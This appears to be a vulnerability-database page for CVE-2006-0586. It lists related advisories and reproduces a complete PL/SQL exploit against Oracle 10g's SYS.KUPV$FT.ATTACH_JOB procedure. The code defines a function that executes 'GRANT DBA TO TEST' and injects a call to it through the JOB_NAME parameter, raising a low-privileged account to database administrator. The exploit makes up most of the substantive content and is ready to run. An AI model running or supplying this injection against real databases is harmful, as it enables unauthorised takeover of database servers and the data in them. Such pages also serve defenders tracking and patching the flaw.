Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Oracle Database Server SQL Injection In Package SYS.KUPV (CVE-2006-0586) | 1 Nov 200900:00 | – | checkpoint_advisories | |
| CVE-2006-0586 | 8 Feb 200601:00 | – | cve | |
| CVE-2006-0586 | 8 Feb 200601:00 | – | cvelist | |
| Oracle 10g - KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission | 22 Feb 200700:00 | – | exploitdb | |
| Oracle 10g KUPV$FT.ATTACH_JOB - SQL Injection (2) | 26 Feb 200700:00 | – | exploitdb | |
| CVE-2006-0586 | 8 Feb 200601:02 | – | nvd | |
| Oracle Database Server Multiple Unspecified Vulnerabilities | 7 Dec 201100:00 | – | openvas | |
| Oracle Application Server Multiple Vulnerabilities | 24 Jan 201200:00 | – | nessus | |
| Oracle Database Multiple Vulnerabilities (January 2006 CPU) | 16 Nov 201100:00 | – | nessus | |
| Sql injection | 8 Feb 200601:02 | – | prion |
10
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <[email protected]>
* Privileges needed:
*
* - EXECUTE_CATALOG_ROLE
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/
DECLARE
USER_NAME VARCHAR2(200);
JOB_NAME VARCHAR2(200);
NEW_JOB BOOLEAN;
v_Return NUMBER;
BEGIN
USER_NAME := 'OWNER';
JOB_NAME := ''' OR ' || USER || '.f1() = 1--';
v_Return := SYS.KUPV$FT.ATTACH_JOB(
USER_NAME => USER_NAME,
JOB_NAME => JOB_NAME,
NEW_JOB => NEW_JOB
);
END;
/
// milw0rm.com [2007-01-23]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.06508